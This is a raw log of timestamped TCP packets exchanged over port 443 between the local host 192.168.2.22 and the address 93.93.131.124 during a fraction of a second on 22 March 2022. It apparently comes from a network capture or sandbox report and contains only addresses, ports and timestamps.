Mar 22, 2022 16:50:26.074388981 CET	49166	443	192.168.2.22	93.93.131.124
Mar 22, 2022 16:50:26.074450970 CET	443	49166	93.93.131.124	192.168.2.22
Mar 22, 2022 16:50:26.074518919 CET	49166	443	192.168.2.22	93.93.131.124
Mar 22, 2022 16:50:26.074659109 CET	443	49166	93.93.131.124	192.168.2.22
Mar 22, 2022 16:50:26.074745893 CET	49166	443	192.168.2.22	93.93.131.124
Mar 22, 2022 16:50:26.075000048 CET	49166	443	192.168.2.22	93.93.131.124
Mar 22, 2022 16:50:26.107202053 CET	443	49166	93.93.131.124	192.168.2.22
Mar 22, 2022 16:50:26.107402086 CET	443	49166	93.93.131.124	192.168.2.22
Mar 22, 2022 16:50:26.107628107 CET	49166	443	192.168.2.22	93.93.131.124
Mar 22, 2022 16:50:26.107652903 CET	443	49166	93.93.131.124	192.168.2.22
Mar 22, 2022 16:50:26.107726097 CET	49166	443	192.168.2.22	93.93.131.124
Mar 22, 2022 16:50:26.107907057 CET	443	49166	93.93.131.124	192.168.2.22
Mar 22, 2022 16:50:26.108000040 CET	49166	443	192.168.2.22	93.93.131.124
Mar 22, 2022 16:50:26.108031034 CET	49166	443	192.168.2.22	93.93.131.124
Mar 22, 2022 16:50:26.108309031 CET	443	49166	93.93.131.124	192.168.2.22
Mar 22, 2022 16:50:26.108395100 CET	49166	443	192.168.2.22	93.93.131.124
Mar 22, 2022 16:50:26.108802080 CET	49166	443	192.168.2.22	93.93.131.124
Mar 22, 2022 16:50:26.108858109 CET	443	49166	93.93.131.124	192.168.2.22
Mar 22, 2022 16:50:26.108930111 CET	49166	443	192.168.2.22	93.93.131.124
Mar 22, 2022 16:50:26.109209061 CET	443	49166	93.93.131.124	192.168.2.22
Mar 22, 2022 16:50:26.109704971 CET	49166	443	192.168.2.22	93.93.131.124
Mar 22, 2022 16:50:26.110146999 CET	49166	443	192.168.2.22	93.93.131.124
Mar 22, 2022 16:50:26.140239000 CET	443	49166	93.93.131.124	192.168.2.22
Mar 22, 2022 16:50:26.140376091 CET	49166	443	192.168.2.22	93.93.131.124
Mar 22, 2022 16:50:26.140398979 CET	443	49166	93.93.131.124	192.168.2.22
Mar 22, 2022 16:50:26.140419006 CET	443	49166	93.93.131.124	192.168.2.22
Mar 22, 2022 16:50:26.140460968 CET	49166	443	192.168.2.22	93.93.131.124
Mar 22, 2022 16:50:26.140595913 CET	49166	443	192.168.2.22	93.93.131.124
Mar 22, 2022 16:50:26.140629053 CET	443	49166	93.93.131.124	192.168.2.22
Mar 22, 2022 16:50:26.140705109 CET	49166	443	192.168.2.22	93.93.131.124
Mar 22, 2022 16:50:26.140918016 CET	443	49166	93.93.131.124	192.168.2.22
Mar 22, 2022 16:50:26.140981913 CET	49166	443	192.168.2.22	93.93.131.124
Mar 22, 2022 16:50:26.141149044 CET	49166	443	192.168.2.22	93.93.131.124
Mar 22, 2022 16:50:26.141205072 CET	443	49166	93.93.131.124	192.168.2.22
Mar 22, 2022 16:50:26.141284943 CET	49166	443	192.168.2.22	93.93.131.124
Mar 22, 2022 16:50:26.141526937 CET	443	49166	93.93.131.124	192.168.2.22
Mar 22, 2022 16:50:26.141587019 CET	49166	443	192.168.2.22	93.93.131.124
Mar 22, 2022 16:50:26.141767979 CET	443	49166	93.93.131.124	192.168.2.22
Mar 22, 2022 16:50:26.141824961 CET	49166	443	192.168.2.22	93.93.131.124
Mar 22, 2022 16:50:26.141989946 CET	443	49166	93.93.131.124	192.168.2.22
Mar 22, 2022 16:50:26.142054081 CET	49166	443	192.168.2.22	93.93.131.124
Mar 22, 2022 16:50:26.142220020 CET	443	49166	93.93.131.124	192.168.2.22
Mar 22, 2022 16:50:26.142283916 CET	49166	443	192.168.2.22	93.93.131.124
Mar 22, 2022 16:50:26.142411947 CET	49166	443	192.168.2.22	93.93.131.124
Mar 22, 2022 16:50:26.142467022 CET	443	49166	93.93.131.124	192.168.2.22
Mar 22, 2022 16:50:26.142528057 CET	49166	443	192.168.2.22	93.93.131.124
Mar 22, 2022 16:50:26.142661095 CET	443	49166	93.93.131.124	192.168.2.22
Mar 22, 2022 16:50:26.142720938 CET	49166	443	192.168.2.22	93.93.131.124
Mar 22, 2022 16:50:26.142868042 CET	443	49166	93.93.131.124	192.168.2.22
Mar 22, 2022 16:50:26.142925024 CET	49166	443	192.168.2.22	93.93.131.124
Mar 22, 2022 16:50:26.143049955 CET	443	49166	93.93.131.124	192.168.2.22
Mar 22, 2022 16:50:26.143114090 CET	49166	443	192.168.2.22	93.93.131.124
Mar 22, 2022 16:50:26.143907070 CET	49166	443	192.168.2.22	93.93.131.124
Mar 22, 2022 16:50:26.176259995 CET	443	49166	93.93.131.124	192.168.2.22
Mar 22, 2022 16:50:26.176399946 CET	443	49166	93.93.131.124	192.168.2.22
Mar 22, 2022 16:50:26.176439047 CET	49166	443	192.168.2.22	93.93.131.124
Mar 22, 2022 16:50:26.176457882 CET	443	49166	93.93.131.124	192.168.2.22
Mar 22, 2022 16:50:26.176471949 CET	49166	443	192.168.2.22	93.93.131.124
Mar 22, 2022 16:50:26.176506996 CET	49166	443	192.168.2.22	93.93.131.124
Mar 22, 2022 16:50:26.176517010 CET	443	49166	93.93.131.124	192.168.2.22
Mar 22, 2022 16:50:26.176537037 CET	443	49166	93.93.131.124	192.168.2.22
Mar 22, 2022 16:50:26.176609039 CET	49166	443	192.168.2.22	93.93.131.124
Mar 22, 2022 16:50:26.176632881 CET	49166	443	192.168.2.22	93.93.131.124
Mar 22, 2022 16:50:26.176661968 CET	443	49166	93.93.131.124	192.168.2.22
Mar 22, 2022 16:50:26.176774979 CET	49166	443	192.168.2.22	93.93.131.124
Mar 22, 2022 16:50:26.176843882 CET	443	49166	93.93.131.124	192.168.2.22
Mar 22, 2022 16:50:26.176954985 CET	49166	443	192.168.2.22	93.93.131.124
Mar 22, 2022 16:50:26.177007914 CET	443	49166	93.93.131.124	192.168.2.22
Mar 22, 2022 16:50:26.177100897 CET	49166	443	192.168.2.22	93.93.131.124
Mar 22, 2022 16:50:26.177217007 CET	443	49166	93.93.131.124	192.168.2.22
Mar 22, 2022 16:50:26.177248001 CET	49166	443	192.168.2.22	93.93.131.124
Mar 22, 2022 16:50:26.177314997 CET	49166	443	192.168.2.22	93.93.131.124
Mar 22, 2022 16:50:26.177356958 CET	49166	443	192.168.2.22	93.93.131.124
Mar 22, 2022 16:50:26.177398920 CET	443	49166	93.93.131.124	192.168.2.22
Mar 22, 2022 16:50:26.177480936 CET	49166	443	192.168.2.22	93.93.131.124
Mar 22, 2022 16:50:26.177591085 CET	443	49166	93.93.131.124	192.168.2.22
Mar 22, 2022 16:50:26.177736998 CET	49166	443	192.168.2.22	93.93.131.124
Mar 22, 2022 16:50:26.177794933 CET	443	49166	93.93.131.124	192.168.2.22
Mar 22, 2022 16:50:26.177880049 CET	49166	443	192.168.2.22	93.93.131.124
Mar 22, 2022 16:50:26.177937031 CET	443	49166	93.93.131.124	192.168.2.22
Mar 22, 2022 16:50:26.178024054 CET	49166	443	192.168.2.22	93.93.131.124
Mar 22, 2022 16:50:26.178132057 CET	443	49166	93.93.131.124	192.168.2.22
Mar 22, 2022 16:50:26.178226948 CET	49166	443	192.168.2.22	93.93.131.124
Mar 22, 2022 16:50:26.178345919 CET	443	49166	93.93.131.124	192.168.2.22
Mar 22, 2022 16:50:26.178425074 CET	49166	443	192.168.2.22	93.93.131.124
Mar 22, 2022 16:50:26.178580999 CET	443	49166	93.93.131.124	192.168.2.22
Mar 22, 2022 16:50:26.178657055 CET	49166	443	192.168.2.22	93.93.131.124
Mar 22, 2022 16:50:26.178745985 CET	443	49166	93.93.131.124	192.168.2.22
Mar 22, 2022 16:50:26.178819895 CET	49166	443	192.168.2.22	93.93.131.124
Mar 22, 2022 16:50:26.178911924 CET	443	49166	93.93.131.124	192.168.2.22
Mar 22, 2022 16:50:26.178988934 CET	49166	443	192.168.2.22	93.93.131.124
Mar 22, 2022 16:50:26.179076910 CET	443	49166	93.93.131.124	192.168.2.22
Mar 22, 2022 16:50:26.179150105 CET	49166	443	192.168.2.22	93.93.131.124
Mar 22, 2022 16:50:26.179244995 CET	443	49166	93.93.131.124	192.168.2.22
Mar 22, 2022 16:50:26.179321051 CET	49166	443	192.168.2.22	93.93.131.124
Mar 22, 2022 16:50:26.179373026 CET	443	49166	93.93.131.124	192.168.2.22
Mar 22, 2022 16:50:26.179445982 CET	49166	443	192.168.2.22	93.93.131.124
Mar 22, 2022 16:50:26.179569960 CET	443	49166	93.93.131.124	192.168.2.22
Mar 22, 2022 16:50:26.179647923 CET	49166	443	192.168.2.22	93.93.131.124
Mar 22, 2022 16:50:26.179698944 CET	443	49166	93.93.131.124	192.168.2.22
Mar 22, 2022 16:50:26.179766893 CET	49166	443	192.168.2.22	93.93.131.124
Mar 22, 2022 16:50:26.179871082 CET	443	49166	93.93.131.124	192.168.2.22
Mar 22, 2022 16:50:26.179940939 CET	49166	443	192.168.2.22	93.93.131.124
Mar 22, 2022 16:50:26.180036068 CET	443	49166	93.93.131.124	192.168.2.22
Mar 22, 2022 16:50:26.180114031 CET	49166	443	192.168.2.22	93.93.131.124
Mar 22, 2022 16:50:26.180200100 CET	443	49166	93.93.131.124	192.168.2.22
Mar 22, 2022 16:50:26.180270910 CET	49166	443	192.168.2.22	93.93.131.124
Mar 22, 2022 16:50:26.180363894 CET	443	49166	93.93.131.124	192.168.2.22
Mar 22, 2022 16:50:26.180428028 CET	49166	443	192.168.2.22	93.93.131.124
Mar 22, 2022 16:50:26.180999994 CET	49166	443	192.168.2.22	93.93.131.124
Mar 22, 2022 16:50:26.213583946 CET	443	49166	93.93.131.124	192.168.2.22
Mar 22, 2022 16:50:26.213728905 CET	443	49166	93.93.131.124	192.168.2.22
Mar 22, 2022 16:50:26.213857889 CET	49166	443	192.168.2.22	93.93.131.124
Mar 22, 2022 16:50:26.213884115 CET	443	49166	93.93.131.124	192.168.2.22
Mar 22, 2022 16:50:26.213898897 CET	49166	443	192.168.2.22	93.93.131.124
Mar 22, 2022 16:50:26.213912010 CET	443	49166	93.93.131.124	192.168.2.22
Mar 22, 2022 16:50:26.213922024 CET	49166	443	192.168.2.22	93.93.131.124
Mar 22, 2022 16:50:26.213937044 CET	49166	443	192.168.2.22	93.93.131.124
Mar 22, 2022 16:50:26.213946104 CET	443	49166	93.93.131.124	192.168.2.22
Mar 22, 2022 16:50:26.213972092 CET	49166	443	192.168.2.22	93.93.131.124
Mar 22, 2022 16:50:26.213989019 CET	49166	443	192.168.2.22	93.93.131.124
Mar 22, 2022 16:50:26.214096069 CET	443	49166	93.93.131.124	192.168.2.22
Mar 22, 2022 16:50:26.214190006 CET	49166	443	192.168.2.22	93.93.131.124
Mar 22, 2022 16:50:26.214340925 CET	443	49166	93.93.131.124	192.168.2.22
Mar 22, 2022 16:50:26.214440107 CET	49166	443	192.168.2.22	93.93.131.124
Mar 22, 2022 16:50:26.214494944 CET	49166	443	192.168.2.22	93.93.131.124
Mar 22, 2022 16:50:26.214550018 CET	443	49166	93.93.131.124	192.168.2.22
Mar 22, 2022 16:50:26.214624882 CET	49166	443	192.168.2.22	93.93.131.124
Mar 22, 2022 16:50:26.214770079 CET	443	49166	93.93.131.124	192.168.2.22
Mar 22, 2022 16:50:26.214859962 CET	49166	443	192.168.2.22	93.93.131.124
Mar 22, 2022 16:50:26.214983940 CET	443	49166	93.93.131.124	192.168.2.22
Mar 22, 2022 16:50:26.215076923 CET	49166	443	192.168.2.22	93.93.131.124
Mar 22, 2022 16:50:26.215236902 CET	443	49166	93.93.131.124	192.168.2.22
Mar 22, 2022 16:50:26.215308905 CET	49166	443	192.168.2.22	93.93.131.124
Mar 22, 2022 16:50:26.215447903 CET	443	49166	93.93.131.124	192.168.2.22
Mar 22, 2022 16:50:26.215518951 CET	49166	443	192.168.2.22	93.93.131.124
Mar 22, 2022 16:50:26.215658903 CET	443	49166	93.93.131.124	192.168.2.22
Mar 22, 2022 16:50:26.215739012 CET	49166	443	192.168.2.22	93.93.131.124
Mar 22, 2022 16:50:26.215876102 CET	443	49166	93.93.131.124	192.168.2.22
Mar 22, 2022 16:50:26.215888023 CET	49166	443	192.168.2.22	93.93.131.124
Mar 22, 2022 16:50:26.215945005 CET	49166	443	192.168.2.22	93.93.131.124
Mar 22, 2022 16:50:26.216089964 CET	443	49166	93.93.131.124	192.168.2.22
Mar 22, 2022 16:50:26.216197014 CET	49166	443	192.168.2.22	93.93.131.124
Mar 22, 2022 16:50:26.216291904 CET	443	49166	93.93.131.124	192.168.2.22
Mar 22, 2022 16:50:26.216375113 CET	49166	443	192.168.2.22	93.93.131.124
Mar 22, 2022 16:50:26.216808081 CET	443	49166	93.93.131.124	192.168.2.22
Mar 22, 2022 16:50:26.216911077 CET	49166	443	192.168.2.22	93.93.131.124
Mar 22, 2022 16:50:26.216947079 CET	443	49166	93.93.131.124	192.168.2.22
Mar 22, 2022 16:50:26.217008114 CET	49166	443	192.168.2.22	93.93.131.124
Mar 22, 2022 16:50:26.217061043 CET	443	49166	93.93.131.124	192.168.2.22
Mar 22, 2022 16:50:26.217118979 CET	49166	443	192.168.2.22	93.93.131.124
Mar 22, 2022 16:50:26.217245102 CET	443	49166	93.93.131.124	192.168.2.22
Mar 22, 2022 16:50:26.217304945 CET	49166	443	192.168.2.22	93.93.131.124
Mar 22, 2022 16:50:26.217509985 CET	443	49166	93.93.131.124	192.168.2.22
Mar 22, 2022 16:50:26.217583895 CET	49166	443	192.168.2.22	93.93.131.124
Mar 22, 2022 16:50:26.217683077 CET	49166	443	192.168.2.22	93.93.131.124
Mar 22, 2022 16:50:26.217765093 CET	443	49166	93.93.131.124	192.168.2.22
Mar 22, 2022 16:50:26.217833996 CET	49166	443	192.168.2.22	93.93.131.124
Mar 22, 2022 16:50:26.218020916 CET	443	49166	93.93.131.124	192.168.2.22
Mar 22, 2022 16:50:26.218066931 CET	49166	443	192.168.2.22	93.93.131.124
Mar 22, 2022 16:50:26.218095064 CET	49166	443	192.168.2.22	93.93.131.124
Mar 22, 2022 16:50:26.218240976 CET	443	49166	93.93.131.124	192.168.2.22
Mar 22, 2022 16:50:26.218350887 CET	49166	443	192.168.2.22	93.93.131.124
Mar 22, 2022 16:50:26.218455076 CET	443	49166	93.93.131.124	192.168.2.22
Mar 22, 2022 16:50:26.218513012 CET	49166	443	192.168.2.22	93.93.131.124
Mar 22, 2022 16:50:26.218663931 CET	443	49166	93.93.131.124	192.168.2.22
Mar 22, 2022 16:50:26.218724012 CET	49166	443	192.168.2.22	93.93.131.124
Mar 22, 2022 16:50:26.218875885 CET	443	49166	93.93.131.124	192.168.2.22
Mar 22, 2022 16:50:26.218934059 CET	49166	443	192.168.2.22	93.93.131.124
Mar 22, 2022 16:50:26.219062090 CET	443	49166	93.93.131.124	192.168.2.22
Mar 22, 2022 16:50:26.219124079 CET	49166	443	192.168.2.22	93.93.131.124
Mar 22, 2022 16:50:26.219254017 CET	443	49166	93.93.131.124	192.168.2.22
Mar 22, 2022 16:50:26.219325066 CET	49166	443	192.168.2.22	93.93.131.124
Mar 22, 2022 16:50:26.219460964 CET	443	49166	93.93.131.124	192.168.2.22
Mar 22, 2022 16:50:26.219521046 CET	49166	443	192.168.2.22	93.93.131.124
Mar 22, 2022 16:50:26.219706059 CET	49166	443	192.168.2.22	93.93.131.124
Mar 22, 2022 16:50:26.219713926 CET	443	49166	93.93.131.124	192.168.2.22
Mar 22, 2022 16:50:26.219780922 CET	49166	443	192.168.2.22	93.93.131.124
Mar 22, 2022 16:50:26.219880104 CET	443	49166	93.93.131.124	192.168.2.22
Mar 22, 2022 16:50:26.219944000 CET	49166	443	192.168.2.22	93.93.131.124
Mar 22, 2022 16:50:26.220081091 CET	443	49166	93.93.131.124	192.168.2.22
Mar 22, 2022 16:50:26.220622063 CET	49166	443	192.168.2.22	93.93.131.124
Mar 22, 2022 16:50:26.222955942 CET	49166	443	192.168.2.22	93.93.131.124
Mar 22, 2022 16:50:26.290971994 CET	443	49166	93.93.131.124	192.168.2.22
Mar 22, 2022 16:50:26.291181087 CET	443	49166	93.93.131.124	192.168.2.22
Mar 22, 2022 16:50:26.291219950 CET	49166	443	192.168.2.22	93.93.131.124
Mar 22, 2022 16:50:26.291239977 CET	443	49166	93.93.131.124	192.168.2.22
Mar 22, 2022 16:50:26.291254044 CET	49166	443	192.168.2.22	93.93.131.124
Mar 22, 2022 16:50:26.291291952 CET	49166	443	192.168.2.22	93.93.131.124
Mar 22, 2022 16:50:26.291299105 CET	443	49166	93.93.131.124	192.168.2.22
Mar 22, 2022 16:50:26.291316986 CET	443	49166	93.93.131.124	192.168.2.22
Mar 22, 2022 16:50:26.291363955 CET	49166	443	192.168.2.22	93.93.131.124
Mar 22, 2022 16:50:26.291409969 CET	49166	443	192.168.2.22	93.93.131.124
Mar 22, 2022 16:50:26.291440964 CET	443	49166	93.93.131.124	192.168.2.22
Mar 22, 2022 16:50:26.291527033 CET	49166	443	192.168.2.22	93.93.131.124
Mar 22, 2022 16:50:26.291599035 CET	443	49166	93.93.131.124	192.168.2.22
Mar 22, 2022 16:50:26.291670084 CET	49166	443	192.168.2.22	93.93.131.124
Mar 22, 2022 16:50:26.291784048 CET	443	49166	93.93.131.124	192.168.2.22
Mar 22, 2022 16:50:26.291948080 CET	49166	443	192.168.2.22	93.93.131.124
Mar 22, 2022 16:50:26.291966915 CET	443	49166	93.93.131.124	192.168.2.22
Mar 22, 2022 16:50:26.292046070 CET	49166	443	192.168.2.22	93.93.131.124
Mar 22, 2022 16:50:26.292119980 CET	49166	443	192.168.2.22	93.93.131.124
Mar 22, 2022 16:50:26.292131901 CET	443	49166	93.93.131.124	192.168.2.22
Mar 22, 2022 16:50:26.292197943 CET	49166	443	192.168.2.22	93.93.131.124
Mar 22, 2022 16:50:26.292305946 CET	443	49166	93.93.131.124	192.168.2.22
Mar 22, 2022 16:50:26.292373896 CET	49166	443	192.168.2.22	93.93.131.124
Mar 22, 2022 16:50:26.292454004 CET	443	49166	93.93.131.124	192.168.2.22
Mar 22, 2022 16:50:26.292519093 CET	49166	443	192.168.2.22	93.93.131.124
Mar 22, 2022 16:50:26.292620897 CET	443	49166	93.93.131.124	192.168.2.22
Mar 22, 2022 16:50:26.292680979 CET	49166	443	192.168.2.22	93.93.131.124
Mar 22, 2022 16:50:26.292742014 CET	443	49166	93.93.131.124	192.168.2.22
Mar 22, 2022 16:50:26.292797089 CET	49166	443	192.168.2.22	93.93.131.124
Mar 22, 2022 16:50:26.292851925 CET	443	49166	93.93.131.124	192.168.2.22
Mar 22, 2022 16:50:26.292921066 CET	49166	443	192.168.2.22	93.93.131.124
Mar 22, 2022 16:50:26.292968988 CET	443	49166	93.93.131.124	192.168.2.22
Mar 22, 2022 16:50:26.293023109 CET	49166	443	192.168.2.22	93.93.131.124
Mar 22, 2022 16:50:26.293075085 CET	443	49166	93.93.131.124	192.168.2.22
Mar 22, 2022 16:50:26.293124914 CET	49166	443	192.168.2.22	93.93.131.124
Mar 22, 2022 16:50:26.293178082 CET	443	49166	93.93.131.124	192.168.2.22
Mar 22, 2022 16:50:26.293226004 CET	49166	443	192.168.2.22	93.93.131.124
Mar 22, 2022 16:50:26.293281078 CET	443	49166	93.93.131.124	192.168.2.22
Mar 22, 2022 16:50:26.293329000 CET	49166	443	192.168.2.22	93.93.131.124
Mar 22, 2022 16:50:26.293384075 CET	443	49166	93.93.131.124	192.168.2.22
Mar 22, 2022 16:50:26.293436050 CET	49166	443	192.168.2.22	93.93.131.124
Mar 22, 2022 16:50:26.293484926 CET	443	49166	93.93.131.124	192.168.2.22
Mar 22, 2022 16:50:26.293535948 CET	49166	443	192.168.2.22	93.93.131.124
Mar 22, 2022 16:50:26.293589115 CET	443	49166	93.93.131.124	192.168.2.22
Mar 22, 2022 16:50:26.293638945 CET	49166	443	192.168.2.22	93.93.131.124
Mar 22, 2022 16:50:26.293687105 CET	443	49166	93.93.131.124	192.168.2.22
Mar 22, 2022 16:50:26.293735981 CET	49166	443	192.168.2.22	93.93.131.124
Mar 22, 2022 16:50:26.293790102 CET	443	49166	93.93.131.124	192.168.2.22
Mar 22, 2022 16:50:26.293840885 CET	49166	443	192.168.2.22	93.93.131.124
Mar 22, 2022 16:50:26.293900013 CET	443	49166	93.93.131.124	192.168.2.22
Mar 22, 2022 16:50:26.293950081 CET	49166	443	192.168.2.22	93.93.131.124
Mar 22, 2022 16:50:26.294003963 CET	443	49166	93.93.131.124	192.168.2.22
Mar 22, 2022 16:50:26.294054985 CET	49166	443	192.168.2.22	93.93.131.124
Mar 22, 2022 16:50:26.294104099 CET	443	49166	93.93.131.124	192.168.2.22
Mar 22, 2022 16:50:26.294157982 CET	49166	443	192.168.2.22	93.93.131.124
Mar 22, 2022 16:50:26.294224977 CET	443	49166	93.93.131.124	192.168.2.22
Mar 22, 2022 16:50:26.294282913 CET	49166	443	192.168.2.22	93.93.131.124
Mar 22, 2022 16:50:26.294326067 CET	443	49166	93.93.131.124	192.168.2.22
Mar 22, 2022 16:50:26.294328928 CET	49166	443	192.168.2.22	93.93.131.124
Mar 22, 2022 16:50:26.294385910 CET	49166	443	192.168.2.22	93.93.131.124
Mar 22, 2022 16:50:26.294431925 CET	443	49166	93.93.131.124	192.168.2.22
Mar 22, 2022 16:50:26.294487953 CET	49166	443	192.168.2.22	93.93.131.124
Mar 22, 2022 16:50:26.294538975 CET	443	49166	93.93.131.124	192.168.2.22
Mar 22, 2022 16:50:26.294645071 CET	443	49166	93.93.131.124	192.168.2.22
Mar 22, 2022 16:50:26.294749975 CET	443	49166	93.93.131.124	192.168.2.22
Mar 22, 2022 16:50:26.294811964 CET	49166	443	192.168.2.22	93.93.131.124
Mar 22, 2022 16:50:26.294823885 CET	443	49166	93.93.131.124	192.168.2.22
Mar 22, 2022 16:50:26.294853926 CET	443	49166	93.93.131.124	192.168.2.22
Mar 22, 2022 16:50:26.294866085 CET	49166	443	192.168.2.22	93.93.131.124
Mar 22, 2022 16:50:26.294872999 CET	443	49166	93.93.131.124	192.168.2.22
Mar 22, 2022 16:50:26.294892073 CET	49166	443	192.168.2.22	93.93.131.124
Mar 22, 2022 16:50:26.294913054 CET	49166	443	192.168.2.22	93.93.131.124
Mar 22, 2022 16:50:26.294955015 CET	443	49166	93.93.131.124	192.168.2.22
Mar 22, 2022 16:50:26.295011997 CET	49166	443	192.168.2.22	93.93.131.124
Mar 22, 2022 16:50:26.295057058 CET	443	49166	93.93.131.124	192.168.2.22
Mar 22, 2022 16:50:26.295156002 CET	443	49166	93.93.131.124	192.168.2.22
Mar 22, 2022 16:50:26.295164108 CET	49166	443	192.168.2.22	93.93.131.124
Mar 22, 2022 16:50:26.295171022 CET	443	49166	93.93.131.124	192.168.2.22
Mar 22, 2022 16:50:26.295236111 CET	49166	443	192.168.2.22	93.93.131.124
Mar 22, 2022 16:50:26.295264959 CET	443	49166	93.93.131.124	192.168.2.22
Mar 22, 2022 16:50:26.295296907 CET	49166	443	192.168.2.22	93.93.131.124
Mar 22, 2022 16:50:26.295304060 CET	443	49166	93.93.131.124	192.168.2.22
Mar 22, 2022 16:50:26.295319080 CET	49166	443	192.168.2.22	93.93.131.124
Mar 22, 2022 16:50:26.295340061 CET	49166	443	192.168.2.22	93.93.131.124
Mar 22, 2022 16:50:26.295372009 CET	443	49166	93.93.131.124	192.168.2.22
Mar 22, 2022 16:50:26.295423031 CET	49166	443	192.168.2.22	93.93.131.124
Mar 22, 2022 16:50:26.295476913 CET	443	49166	93.93.131.124	192.168.2.22
Mar 22, 2022 16:50:26.295531988 CET	49166	443	192.168.2.22	93.93.131.124
Mar 22, 2022 16:50:26.295584917 CET	443	49166	93.93.131.124	192.168.2.22
Mar 22, 2022 16:50:26.295651913 CET	49166	443	192.168.2.22	93.93.131.124
Mar 22, 2022 16:50:26.295687914 CET	443	49166	93.93.131.124	192.168.2.22
Mar 22, 2022 16:50:26.295747042 CET	49166	443	192.168.2.22	93.93.131.124
Mar 22, 2022 16:50:26.295793056 CET	443	49166	93.93.131.124	192.168.2.22
Mar 22, 2022 16:50:26.295898914 CET	443	49166	93.93.131.124	192.168.2.22
Mar 22, 2022 16:50:26.295902967 CET	49166	443	192.168.2.22	93.93.131.124
Mar 22, 2022 16:50:26.295943022 CET	443	49166	93.93.131.124	192.168.2.22
Mar 22, 2022 16:50:26.296011925 CET	49166	443	192.168.2.22	93.93.131.124
Mar 22, 2022 16:50:26.296041012 CET	443	49166	93.93.131.124	192.168.2.22
Mar 22, 2022 16:50:26.296111107 CET	49166	443	192.168.2.22	93.93.131.124
Mar 22, 2022 16:50:26.300230026 CET	49166	443	192.168.2.22	93.93.131.124
Mar 22, 2022 16:50:26.303482056 CET	49166	443	192.168.2.22	93.93.131.124
Mar 22, 2022 16:50:26.324215889 CET	443	49166	93.93.131.124	192.168.2.22
Mar 22, 2022 16:50:26.324414015 CET	443	49166	93.93.131.124	192.168.2.22
Mar 22, 2022 16:50:26.324496984 CET	49166	443	192.168.2.22	93.93.131.124
Mar 22, 2022 16:50:26.324515104 CET	443	49166	93.93.131.124	192.168.2.22
Mar 22, 2022 16:50:26.324543953 CET	49166	443	192.168.2.22	93.93.131.124
Mar 22, 2022 16:50:26.324543953 CET	443	49166	93.93.131.124	192.168.2.22
Mar 22, 2022 16:50:26.324567080 CET	49166	443	192.168.2.22	93.93.131.124
Mar 22, 2022 16:50:26.324584007 CET	49166	443	192.168.2.22	93.93.131.124
Mar 22, 2022 16:50:26.324592113 CET	443	49166	93.93.131.124	192.168.2.22
Mar 22, 2022 16:50:26.324600935 CET	49166	443	192.168.2.22	93.93.131.124
Mar 22, 2022 16:50:26.324623108 CET	49166	443	192.168.2.22	93.93.131.124
Mar 22, 2022 16:50:26.324707031 CET	443	49166	93.93.131.124	192.168.2.22
Mar 22, 2022 16:50:26.324767113 CET	49166	443	192.168.2.22	93.93.131.124
Mar 22, 2022 16:50:26.324835062 CET	443	49166	93.93.131.124	192.168.2.22
Mar 22, 2022 16:50:26.324907064 CET	49166	443	192.168.2.22	93.93.131.124
Mar 22, 2022 16:50:26.324985981 CET	443	49166	93.93.131.124	192.168.2.22
Mar 22, 2022 16:50:26.325078011 CET	49166	443	192.168.2.22	93.93.131.124
Mar 22, 2022 16:50:26.325088978 CET	49166	443	192.168.2.22	93.93.131.124
Mar 22, 2022 16:50:26.325120926 CET	443	49166	93.93.131.124	192.168.2.22
Mar 22, 2022 16:50:26.325175047 CET	49166	443	192.168.2.22	93.93.131.124
Mar 22, 2022 16:50:26.325253010 CET	443	49166	93.93.131.124	192.168.2.22
Mar 22, 2022 16:50:26.325314045 CET	49166	443	192.168.2.22	93.93.131.124
Mar 22, 2022 16:50:26.325396061 CET	443	49166	93.93.131.124	192.168.2.22
Mar 22, 2022 16:50:26.325449944 CET	49166	443	192.168.2.22	93.93.131.124
Mar 22, 2022 16:50:26.325521946 CET	443	49166	93.93.131.124	192.168.2.22
Mar 22, 2022 16:50:26.325593948 CET	49166	443	192.168.2.22	93.93.131.124
Mar 22, 2022 16:50:26.325676918 CET	443	49166	93.93.131.124	192.168.2.22
Mar 22, 2022 16:50:26.325762987 CET	49166	443	192.168.2.22	93.93.131.124
Mar 22, 2022 16:50:26.325804949 CET	443	49166	93.93.131.124	192.168.2.22
Mar 22, 2022 16:50:26.325932980 CET	443	49166	93.93.131.124	192.168.2.22
Mar 22, 2022 16:50:26.326054096 CET	443	49166	93.93.131.124	192.168.2.22
Mar 22, 2022 16:50:26.326090097 CET	49166	443	192.168.2.22	93.93.131.124
Mar 22, 2022 16:50:26.326097965 CET	443	49166	93.93.131.124	192.168.2.22
Mar 22, 2022 16:50:26.326108932 CET	49166	443	192.168.2.22	93.93.131.124
Mar 22, 2022 16:50:26.326133966 CET	49166	443	192.168.2.22	93.93.131.124
Mar 22, 2022 16:50:26.326222897 CET	443	49166	93.93.131.124	192.168.2.22
Mar 22, 2022 16:50:26.326289892 CET	49166	443	192.168.2.22	93.93.131.124
Mar 22, 2022 16:50:26.326383114 CET	443	49166	93.93.131.124	192.168.2.22
Mar 22, 2022 16:50:26.326461077 CET	49166	443	192.168.2.22	93.93.131.124
Mar 22, 2022 16:50:26.326525927 CET	443	49166	93.93.131.124	192.168.2.22
Mar 22, 2022 16:50:26.326584101 CET	49166	443	192.168.2.22	93.93.131.124
Mar 22, 2022 16:50:26.326675892 CET	443	49166	93.93.131.124	192.168.2.22
Mar 22, 2022 16:50:26.326742887 CET	49166	443	192.168.2.22	93.93.131.124
Mar 22, 2022 16:50:26.326817036 CET	443	49166	93.93.131.124	192.168.2.22
Mar 22, 2022 16:50:26.326874018 CET	49166	443	192.168.2.22	93.93.131.124
Mar 22, 2022 16:50:26.326910973 CET	49166	443	192.168.2.22	93.93.131.124
Mar 22, 2022 16:50:26.326957941 CET	443	49166	93.93.131.124	192.168.2.22
Mar 22, 2022 16:50:26.327016115 CET	49166	443	192.168.2.22	93.93.131.124
Mar 22, 2022 16:50:26.327073097 CET	443	49166	93.93.131.124	192.168.2.22
Mar 22, 2022 16:50:26.327125072 CET	49166	443	192.168.2.22	93.93.131.124
Mar 22, 2022 16:50:26.327183962 CET	443	49166	93.93.131.124	192.168.2.22
Mar 22, 2022 16:50:26.327234030 CET	49166	443	192.168.2.22	93.93.131.124
Mar 22, 2022 16:50:26.327275991 CET	443	49166	93.93.131.124	192.168.2.22
Mar 22, 2022 16:50:26.327327013 CET	49166	443	192.168.2.22	93.93.131.124
Mar 22, 2022 16:50:26.333444118 CET	49166	443	192.168.2.22	93.93.131.124
Mar 22, 2022 16:50:26.362997055 CET	443	49166	93.93.131.124	192.168.2.22
